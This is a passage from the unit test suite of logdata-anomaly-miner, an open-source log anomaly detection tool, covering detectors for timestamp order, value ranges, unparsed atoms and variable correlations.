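        An appropriate error message is expected from the check_status-method; the output of the
        do_timer-method is also tested in this test case.
        """
        description = "Test5TimeCorrelationViolationDetector"
        time_correlation_violation_detector = self._create_detector(description)
        t = time.time()
        log_atom1 = LogAtom(self.match_context1.match_data, ParserMatch(self.match_element1), t, self)
        time_correlation_violation_detector.receive_atom(log_atom1)
        # in time (+1), but Value3Value is 22501 instead of the A-event's 22500
        log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2_different), t + 1, self)
        time_correlation_violation_detector.receive_atom(log_atom2)
        time_correlation_violation_detector.do_timer(time.time())
        self.assertEqual(self.output_stream.getvalue(), self._expected_string_different_attributes % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string), self.correlation_rule.rule_id, description, 1,
            self.match_element1.get_match_string().decode(), self.a_class_selector.action_id, 22500, 22501))

    def test6_prepare_history_entry(self):
        """
        Test the prepare_history_entry-method for both event classes.

        The entry consists of the atom timestamp, a 0, the selector, the parser match and the artefact value
        (22500) extracted via artefact_match_parameters. The single parameter pair from setUp is used here.
        """
        t = time.time()
        p1 = ParserMatch(self.match_element1)
        p2 = ParserMatch(self.match_element2)
        log_atom1 = LogAtom(self.match_context1.match_data, p1, t, self)
        log_atom2 = LogAtom(self.match_context2.match_data, p2, t + 5, self)
        result = self.correlation_rule.prepare_history_entry(self.a_class_selector, log_atom1)
        self.assertEqual(result, [t, 0, self.a_class_selector, p1, 22500])
        result = self.correlation_rule.prepare_history_entry(self.b_class_selector, log_atom2)
        self.assertEqual(result, [t + 5, 0, self.b_class_selector, p2, 22500])


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/TimestampCorrectionFiltersTest.py000066400000000000000000000040241437606560100323450ustar00rootroot00000000000000
import unittest
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust
from time import time
from unit.TestBase import TestBase
from datetime import datetime


class TimestampCorrectionFiltersTest(TestBase):
    """Unittests for the TimestampCorrectionFilters."""

    __expected_string = '%s New path(es) detected\n%s: "%s" (%d lines)\n %s\n pid=\n\n'
    match_path = "['match/s1']"

    def test1simple_monotonic_timestamp_adjust_test(self): """This test case checks if the timestamp is adjusted and logAtoms are forwarded correctly.""" description = "Test1TimestampCorrectionFilter" match_context_fixed_dme = MatchContext(b' pid=') fixed_dme = FixedDataModelElement('s1', b' pid=') match_element_fixed_dme = fixed_dme.get_match_element("match", match_context_fixed_dme) t = time() new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False)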
self.analysis_context.register_component(new_match_path_detector, description) simple_monotonic_timstamp_adjust = SimpleMonotonicTimestampAdjust([new_match_path_detector], False) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, new_match_path_detector) self.assertEqual(simple_monotonic_timstamp_adjust.receive_atom(log_atom_fixed_dme), True) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), new_match_path_detector.__class__.__name__, description, 1, self.match_path)) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/TimestampsUnsortedDetectorTest.py000066400000000000000000000136341437606560100323740ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from time import time from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector from unit.TestBase import TestBase from datetime import datetime class TimestampsUnsortedDetectorTest(TestBase): """Unittests for the TimestampsUnsortedDetector.""" __expected_string = '%s Timestamp %s below %s\n%s: "%s" (%d lines)\n %s\n\n' pid = b' pid=' datetime_format_string = '%Y-%m-%d %H:%M:%S' def test1timestamp_lower_than_last_timestamp(self): """This test case checks if an event is created, when the timestamp is lower than the last one.""" description = "Test1TimestampsUnsortedDetector" match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match", match_context_fixed_dme) new_match_path_detector = NewMatchPathDetector(self.aminer_config, 
[self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, new_match_path_detector) timestamp_unsorted_detector = TimestampsUnsortedDetector(self.aminer_config, [self.stream_printer_event_handler], False, output_logline=False) self.analysis_context.register_component(timestamp_unsorted_detector, description + "2") self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '') log_atom.set_timestamp(t - 10000) self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t - 10000).strftime(self.datetime_format_string), datetime.fromtimestamp(t - 10000).strftime(self.datetime_format_string), datetime.fromtimestamp(t).strftime(self.datetime_format_string), timestamp_unsorted_detector.__class__.__name__, description + "2", 1, " pid=")) def test2timestamp_lower_than_last_timestamp_exit_on_error(self): """This test case checks if the program exits, when the timestamp is lower than the last one and the exitOnError flag is set.""" description = "Test2TimestampsUnsortedDetector" match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match", match_context_fixed_dme) new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, new_match_path_detector) timestamp_unsorted_detector = TimestampsUnsortedDetector(self.aminer_config, [self.stream_printer_event_handler], True, output_logline=False) 
self.analysis_context.register_component(timestamp_unsorted_detector, description + "2") self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '') log_atom.set_timestamp(t - 10000) with self.assertRaises(SystemExit) as cm: timestamp_unsorted_detector.receive_atom(log_atom) self.assertEqual(cm.exception.code, 1) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t - 10000).strftime(self.datetime_format_string), datetime.fromtimestamp(t - 10000).strftime(self.datetime_format_string), datetime.fromtimestamp(t).strftime(self.datetime_format_string), timestamp_unsorted_detector.__class__.__name__, description + "2", 1, " pid=")) def test3timestamp_higher_than_last_timestamp(self): """This test case checks if nothing happens, when the timestamp is, as expected, higher than the last one.""" description = "Test3TimestampsUnsortedDetector" match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match", match_context_fixed_dme) new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, new_match_path_detector) timestamp_unsorted_detector = TimestampsUnsortedDetector(self.aminer_config, [self.stream_printer_event_handler], False, output_logline=False) self.analysis_context.register_component(timestamp_unsorted_detector, description + "2") self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '') log_atom.set_timestamp(t) self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '') log_atom.set_timestamp(t + 10000) 
self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '') if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/UnparsedAtomHandlersTest.py000066400000000000000000000064641437606560100311160ustar00rootroot00000000000000import unittest from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from time import time from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchContext import MatchContext from aminer.input.LogAtom import LogAtom from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler from unit.TestBase import TestBase class SimpleUnparsedAtomHandlerTest(TestBase): """Unittests for the SimpleUnparsedAtomHandler.""" calculation = b'256 * 2 = 512' def test1_atom_is_unparsed(self): """The atom in this test case has a ParserMatch.""" description = "Test1SimpleUnparsedAtomHandler" any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) match_context = MatchContext(self.calculation) match_element = any_byte_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), time(), new_match_path_detector1) simple_unparsed_atom_handler = SimpleUnparsedAtomHandler([self.stream_printer_event_handler]) self.analysis_context.register_component(simple_unparsed_atom_handler, description) self.assertTrue(not simple_unparsed_atom_handler.receive_atom(log_atom)) def test2_atom_is_parsed(self): """The atom in this test case has no ParserMatch.""" description = "Test2SimpleUnparsedAtomHandler" any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, 
[self.stream_printer_event_handler], 'Default', False)
        match_context = MatchContext(self.calculation)
        match_element = any_byte_data_model_element.get_match_element('match', match_context)
        # parser_match is None here; this is the case the handler is meant to pick up as "unparsed".
        log_atom = LogAtom(match_element.match_object, None, time(), new_match_path_detector1)
        simple_unparsed_atom_handler = SimpleUnparsedAtomHandler([self.stream_printer_event_handler])
        self.analysis_context.register_component(simple_unparsed_atom_handler, description)
        # receive_atom() returns True for the unparsed atom, i.e. the handler consumed it.
        self.assertTrue(simple_unparsed_atom_handler.receive_atom(log_atom))

    def test3_parser_match_is_other_element(self):
        """
        Pass an object that is not a ParserMatch (the data model element itself) as the atom's parser match.
        The atom is still considered parsed, so receive_atom() returns False; this suggests the handler treats any
        non-None parser match as "parsed" rather than checking the type — confirm against SimpleUnparsedAtomHandler.
        """
        description = "Test3SimpleUnparsedAtomHandler"
        any_byte_data_model_element = AnyByteDataModelElement('a1')
        new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False)
        match_context = MatchContext(self.calculation)
        match_element = any_byte_data_model_element.get_match_element('match', match_context)
        # Deliberately not a ParserMatch instance.
        log_atom = LogAtom(match_element.match_object, any_byte_data_model_element, time(), new_match_path_detector1)
        simple_unparsed_atom_handler = SimpleUnparsedAtomHandler([self.stream_printer_event_handler])
        self.analysis_context.register_component(simple_unparsed_atom_handler, description)
        self.assertTrue(not simple_unparsed_atom_handler.receive_atom(log_atom))


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/ValueRangeDetectorTest.py000066400000000000000000000242771437606560100305560ustar00rootroot00000000000000
import unittest
from aminer.analysis.ValueRangeDetector import ValueRangeDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase


class TestHandler():
    """Dummy anomaly handler that only records the event data of the most recently received anomaly."""

    def __init__(self):
        # Event data (evdat) of the last anomaly; None until the first anomaly arrives. Tests reset it to None
        # between atoms so that "no anomaly" can be asserted with assertIsNone.
        self.anomaly = None

    # skipcq:
    # PYL-W0613
    def receive_event(self, name, msg, ll, evdat, atom, obj):
        """Receive anomaly information; only the event data dictionary is kept, every other argument is ignored."""
        self.anomaly = evdat


class ValueRangeDetectorTest(TestBase):
    """Unittests for the ValueRangeDetector."""

    def test1_normal_sequence_detection(self):
        """
        Check the normal detection of new value ranges.
        The VRD learns an interval per identifier and reports values outside of it; two identifiers (a, b) are used.
        After each atom the handler's last event data is compared against the expected anomaly dictionary.
        """
        description = "Test1ValueRangeeDetector"
        # Initialize detector; the TestHandler captures the event data of every anomaly.
        test_handler = TestHandler()
        # NOTE(review): the positional arguments after the handler list are the id paths, the value paths, a
        # persistence id and two flags — confirm their meaning against the ValueRangeDetector signature.
        value_range_detector = ValueRangeDetector(self.aminer_config, [test_handler], ['/model/id'], ['/model/value'], 'Default', True, False)
        self.analysis_context.register_component(value_range_detector, description)
        # Prepare log atoms that represent two entities (id) with floats (value). Anomalies are generated when ranges are first established.
        # Then, one identifier (a) has a valid value, while the other one (b) has a value outside of the range that generates an anomaly.
# The following events are generated: # id: a value: 2.5 # id: b value: 5 # id: a value: 4.75 # id: b value: 6.3 # id: a value: 4.25 # id: b value: 3.1 m_1 = MatchElement('/model/id', b'a', b'a', None) m_2 = MatchElement('/model/value', b'2.5', 2.5, None) match_element_1 = MatchElement('/model', b'a2.5', b'a2.5', [m_1, m_2]) parser_match_1 = ParserMatch(match_element_1) log_atom_1 = LogAtom(b'a2.5', parser_match_1, 1, None) m_3 = MatchElement('/model/id', b'b', b'b', None) m_4 = MatchElement('/model/value', b'5', 5, None) match_element_2 = MatchElement('/model', b'b5', b'b5', [m_3, m_4]) parser_match_2 = ParserMatch(match_element_2) log_atom_2 = LogAtom(b'b5', parser_match_2, 2, None) m_5 = MatchElement('/model/id', b'a', b'a', None) m_6 = MatchElement('/model/value', b'4.75', 4.75, None) match_element_3 = MatchElement('/model', b'a4.75', b'a4.75', [m_5, m_6]) parser_match_3 = ParserMatch(match_element_3) log_atom_3 = LogAtom(b'a4.75', parser_match_3, 3, None) m_7 = MatchElement('/model/id', b'b', b'b', None) m_8 = MatchElement('/model/value', b'6.3', 6.3, None) match_element_4 = MatchElement('/model', b'b6.3', b'b6.3', [m_7, m_8]) parser_match_4 = ParserMatch(match_element_4) log_atom_4 = LogAtom(b'b6.3', parser_match_4, 4, None) m_9 = MatchElement('/model/id', b'a', b'a', None) m_10 = MatchElement('/model/value', b'4.25', 4.25, None) match_element_5 = MatchElement('/model', b'a4.25', b'a4.25', [m_9, m_10]) parser_match_5 = ParserMatch(match_element_5) log_atom_5 = LogAtom(b'a4.25', parser_match_5, 5, None) m_11 = MatchElement('/model/id', b'b', b'b', None) m_12 = MatchElement('/model/value', b'3.1', 3.1, None) match_element_6 = MatchElement('/model', b'b3.1', b'b3.1', [m_11, m_12]) parser_match_6 = ParserMatch(match_element_6) log_atom_6 = LogAtom(b'b3.1', parser_match_6, 6, None) # Forward log atoms to detector # First value of id (a) should not generate an anomaly # Input: id: a value: 2.5 # Expected output: None value_range_detector.receive_atom(log_atom_1) 
self.assertIsNone(test_handler.anomaly) # First value of id (b) should not generate an anomaly # Input: id: b value: 5 # Expected output: None value_range_detector.receive_atom(log_atom_2) self.assertIsNone(test_handler.anomaly) # Second value of id (a) should generate an anomaly for new range # Input: id: a value: 4.75 # Expected output: Anomaly value_range_detector.receive_atom(log_atom_3) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': [4.75], 'IDpaths': ['/model/id'], 'IDvalues': ['a'], 'Range': [2.5, 2.5]}}) test_handler.anomaly = None # Second value of id (b) should generate an anomaly for new range # Input: id: b value: 6.3 # Expected output: Anomaly value_range_detector.receive_atom(log_atom_4) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': [6.3], 'IDpaths': ['/model/id'], 'IDvalues': ['b'], 'Range': [5, 5]}}) test_handler.anomaly = None # Third value of id (a) is in expected range, thus no anomaly is generated # Input: id: a value: 4.25 # Expected output: None value_range_detector.receive_atom(log_atom_5) self.assertIsNone(test_handler.anomaly) # Third value of id (b) is outside of expected range, thus anomaly is generated value_range_detector.receive_atom(log_atom_6) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': [3.1], 'IDpaths': ['/model/id'], 'IDvalues': ['b'], 'Range': [5, 6.3]}}) test_handler.anomaly = None def test2_do_persist(self): """Test if learned ranges are persisted and loaded successfully.""" description = "Test2ValueRangeeDetector" # Initialize detector test_handler = TestHandler() value_range_detector = ValueRangeDetector(self.aminer_config, [test_handler], ['/model/id'], ['/model/value'], 'Default', True, False) self.analysis_context.register_component(value_range_detector, description) # Prepare 
log atoms that represent two entities (id) with floats (value). Anomalies are generated when ranges are first established. # Then, one identifier (a) has a valid value, while the other one (b) has a value outside of the range that generates an anomaly. # The following events are generated: # id: a value: 2.5 # id: b value: 5 # id: a value: 4.75 # id: b value: 6.3 # id: a value: 4.25 # id: b value: 3.1 m_1 = MatchElement('/model/id', b'a', b'a', None) m_2 = MatchElement('/model/value', b'2.5', 2.5, None) match_element_1 = MatchElement('/model', b'a2.5', b'a2.5', [m_1, m_2]) parser_match_1 = ParserMatch(match_element_1) log_atom_1 = LogAtom(b'a2.5', parser_match_1, 1, None) m_3 = MatchElement('/model/id', b'b', b'b', None) m_4 = MatchElement('/model/value', b'5', 5, None) match_element_2 = MatchElement('/model', b'b5', b'b5', [m_3, m_4]) parser_match_2 = ParserMatch(match_element_2) log_atom_2 = LogAtom(b'b5', parser_match_2, 2, None) m_5 = MatchElement('/model/id', b'a', b'a', None) m_6 = MatchElement('/model/value', b'4.75', 4.75, None) match_element_3 = MatchElement('/model', b'a4.75', b'a4.75', [m_5, m_6]) parser_match_3 = ParserMatch(match_element_3) log_atom_3 = LogAtom(b'a4.75', parser_match_3, 3, None) m_7 = MatchElement('/model/id', b'b', b'b', None) m_8 = MatchElement('/model/value', b'6.3', 6.3, None) match_element_4 = MatchElement('/model', b'b6.3', b'b6.3', [m_7, m_8]) parser_match_4 = ParserMatch(match_element_4) log_atom_4 = LogAtom(b'b6.3', parser_match_4, 4, None) m_9 = MatchElement('/model/id', b'a', b'a', None) m_10 = MatchElement('/model/value', b'4.25', 4.25, None) match_element_5 = MatchElement('/model', b'a4.25', b'a4.25', [m_9, m_10]) parser_match_5 = ParserMatch(match_element_5) log_atom_5 = LogAtom(b'a4.25', parser_match_5, 5, None) m_11 = MatchElement('/model/id', b'b', b'b', None) m_12 = MatchElement('/model/value', b'3.1', 3.1, None) match_element_6 = MatchElement('/model', b'b3.1', b'b3.1', [m_11, m_12]) parser_match_6 = 
ParserMatch(match_element_6)
        log_atom_6 = LogAtom(b'b3.1', parser_match_6, 6, None)

        # Feed all six atoms; the anomalies raised along the way are not checked here, only the learned ranges.
        value_range_detector.receive_atom(log_atom_1)
        value_range_detector.receive_atom(log_atom_2)
        value_range_detector.receive_atom(log_atom_3)
        value_range_detector.receive_atom(log_atom_4)
        value_range_detector.receive_atom(log_atom_5)
        value_range_detector.receive_atom(log_atom_6)
        value_range_detector.do_persist()

        # A second detector with the same configuration must load the persisted ranges.
        value_range_detector1 = ValueRangeDetector(self.aminer_config, [test_handler], ['/model/id'], ['/model/value'], 'Default', True, False)
        self.assertEqual(value_range_detector.ranges_min, value_range_detector1.ranges_min)
        self.assertEqual(value_range_detector.ranges_max, value_range_detector1.ranges_max)
        # Keys are tuples of the id values. The 3.1 value for 'b' (an anomaly when it arrived) was nevertheless
        # taken into the range, so min('b') ends up as 3.1.
        self.assertEqual(value_range_detector1.ranges_min, {('a',): 2.5, ('b',): 3.1})
        self.assertEqual(value_range_detector1.ranges_max, {('a',): 4.75, ('b',): 6.3})


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/VariableCorrelationDetectorTest.py000066400000000000000000001544121437606560100324510ustar00rootroot00000000000000
from aminer.analysis.EventTypeDetector import EventTypeDetector
from aminer.analysis.VariableTypeDetector import VariableTypeDetector
from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase
from time import time
import random
from copy import deepcopy


class VariableCorrelationDetectorTest(TestBase):
    """Unittests for the VariableCorrelationDetector."""

    # Number of executions of the tested function (not referenced by the tests visible in this file section).
    iterations = 20
    # Size of the initial data sample; passed as num_init and used as the loop bound when generating atoms.
    dataset_size = 100
    # Significance level; passed to the VariableTypeDetector as gof_alpha.
    significance_niveau = 0.05

    def test1filter_variables_with_vtd(self):
        """Check that the variables are filtered accurately when a VariableTypeDetector is used."""
        self.filter_variables(True)

    def
test2filter_variables_without_vtd(self): """This test case checks if the variables are filtered accurately without using the VariableTypeDetector.""" self.filter_variables(False) def filter_variables(self, use_vtd): """Run the filter variables code with or without the VariableTypeDetector.""" t = time() stat_data = b'5.3.0-55-generic' log_atom = LogAtom(stat_data, ParserMatch(MatchElement(None, stat_data, stat_data, None)), t, self.__class__.__name__) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.3, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) for _ in range(self.dataset_size): etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) # the vcd should not learn any correlations in static data. self.assertEqual(vcd.pos_var_val, [[]]) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=False, sim_thres=0.5, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) for i in range(self.dataset_size): stat_data = bytes(str((i % 60) * 0.1), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, None)), t, self.__class__.__name__) etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) # the vcd should not learn any correlations in others data. 
self.assertEqual(vcd.pos_var_val, [[]]) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.3, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 0.1), 'utf-8') values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, None)), t, self.__class__.__name__) etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) values_set = list(set(values)) # the vcd should learn any correlations in discrete data. self.assertEqual(vcd.pos_var_val, [[values_set]]) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.3, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 11) * 0.1), 'utf-8') values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(None, stat_data, stat_data, None)), t, self.__class__.__name__) etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) # the vcd should not learn any correlations if the discrete data is not in the threshold. 
self.assertEqual(vcd.pos_var_val, [[]])

    def test3initialize_variables_with_matchDiscDistr_preselection_method(self):
        """
        Check the matchDiscDistr preselection method (pick_cor_match_disc_distr).
        Both inputs are lists of occurrence probabilities; True means the two variables are kept as a correlation
        candidate, False means they are rejected because the distributions differ too much.
        """
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1)
        values_list1 = [1.0/10]*10
        values_list2 = [1.0/14]*14
        # a correlation should be detected even if the second list contains more values than the first.
        self.assertTrue(vcd.pick_cor_match_disc_distr(values_list1, values_list2))
        values_list2 = [1.0/7]*7
        # a correlation should be detected even if the second list contains less values than the first.
        self.assertTrue(vcd.pick_cor_match_disc_distr(values_list1, values_list2))
        values_list2 = [1.0/30]*30
        # a correlation should not be detected if the probability of occurrence difference is too high.
        self.assertFalse(vcd.pick_cor_match_disc_distr(values_list1, values_list2))
        values_list2 = [0.2] + [0.8/9]*9
        # a correlation should not be detected if the probability of occurrence difference is too high.
        self.assertFalse(vcd.pick_cor_match_disc_distr(values_list1, values_list2))
        # find correlations even when the lists are randomly shuffled.
        # random is not seeded, so the order differs between runs; the assertion must hold for every order.
        values_list1 = [0.3]*2 + [0.4/3]*3
        values_list2 = [1.0/5] * 5
        random.shuffle(values_list1)
        self.assertTrue(vcd.pick_cor_match_disc_distr(values_list1, values_list2))

    def test4initialize_variables_with_excludeDueDistr_preselection_method(self):
        """
        Check the excludeDueDistr preselection method (pick_cor_exclude_due_distr).
        The input is a list of occurrence probabilities of one variable; True means the variable is kept, False means
        it is excluded because a single value dominates the distribution.
        """
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1)
        # equal distribution - no exclusion expected
        values = [0.1]*10
        self.assertTrue(vcd.pick_cor_exclude_due_distr(values))
        # almost equal distribution - no exclusion expected
        values = [0.3] + [0.078]*9
        self.assertTrue(vcd.pick_cor_exclude_due_distr(values))
        # one value with high probability - exclusion expected
        values = [0.5] + [0.056]*9
        self.assertFalse(vcd.pick_cor_exclude_due_distr(values))
        # multiple values with high probability - no exclusion expected
        values = [0.3]*3 + [0.014]*7
        self.assertTrue(vcd.pick_cor_exclude_due_distr(values))
        # check boundaries: for 2, 3 and 4 values the even split is kept and the dominated split is excluded
        values = [0.5]*2
        self.assertTrue(vcd.pick_cor_exclude_due_distr(values))
        values = [0.8, 0.2]
        self.assertFalse(vcd.pick_cor_exclude_due_distr(values))
        values = [0.33]*3
        self.assertTrue(vcd.pick_cor_exclude_due_distr(values))
        values = [0.7] + [0.15]*2
        self.assertFalse(vcd.pick_cor_exclude_due_distr(values))
        values = [0.25]*4
        self.assertTrue(vcd.pick_cor_exclude_due_distr(values))
        values = [0.58] + [0.14]*3
        self.assertFalse(vcd.pick_cor_exclude_due_distr(values))

    def test5initialize_variables_with_matchDiscVals_preselection_method(self):
        """
        Check the matchDiscVals preselection method (pick_cor_match_disc_vals).
        Unlike test3 this method receives the discrete values themselves instead of probabilities, but the values are
        chosen to resemble the ones used in test3.
        """
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1)
        values_set1 = [i*0.1 for i in range(10)]
        values_set2 = [i*0.2 for i in range(7)]
        # a correlation should be detected even if the second list contains less values than the first.
        self.assertTrue(vcd.pick_cor_match_disc_vals(values_set1, values_set2))
        values_set2 = [i*0.3 for i in range(7)]
        # a correlation should not be detected if too many values are different.
        self.assertFalse(vcd.pick_cor_match_disc_vals(values_set1, values_set2))
        # Round-trip each value through its text form, as the other tests in this class do when building stat_data.
        values = []
        for i in range(58):
            stat_data = bytes(str(i * 0.1), 'utf-8')
            values.append(float(stat_data))
        values_set1 = values
        values = []
        for i in range(41):
            stat_data = bytes(str(i * 0.2), 'utf-8')
            values.append(float(stat_data))
        values_set2 = values
        # a correlation should be detected if not too many values are different.
        self.assertTrue(vcd.pick_cor_match_disc_vals(values_set1, values_set2))
        # 41 and 42 values bracket the method's threshold for this data: one more value tips it over.
        values = []
        for i in range(42):
            stat_data = bytes(str(i * 0.2), 'utf-8')
            values.append(float(stat_data))
        values_set2 = values
        # a correlation should not be detected if too many values are different.
        self.assertFalse(vcd.pick_cor_match_disc_vals(values_set1, values_set2))

    def test6initialize_variables_with_random_preselection_method(self):
        """
        Check the random preselection method.
        It tests all percentage_random_cors in [0.01..1.0[. For all paths the possible number of combinations is 10.
        The expected number of correlations is rounded. For example with 0.05 <= percentage_random_cors < 0.15 exactly
        one combination is expected. The combinations also must not be repeated reversed and combinations with itself
        are not allowed. The used discrete data is the same for every path.
""" t = time() etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['random']) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 0.1), 'utf-8') values.append(float(stat_data)) children = [MatchElement(str(j), stat_data, stat_data, None) for j in range(5)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', str(i).encode(), str(i).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) # test random correlation picking by using vcd.percentage_random_cors [0.01..1.0[ for i in range(1, 100): vcd.percentage_random_cors = i / 100 # out of 10 possible combinations exactly x should occur. x = i // 10 + (i % 10 >= 5) correlations = vcd.pick_cor_random(0) self.assertEqual(len(correlations), x, "Error at i = %d" % i) for corr in correlations: # one path must not correlate with itself. self.assertNotEqual(corr[0], corr[1]) # the same, reversed combination must not be in values. self.assertFalse([corr[1], corr[0]] in correlations) # test if a ValueError is raised when percentage_random_cors is out of range. 
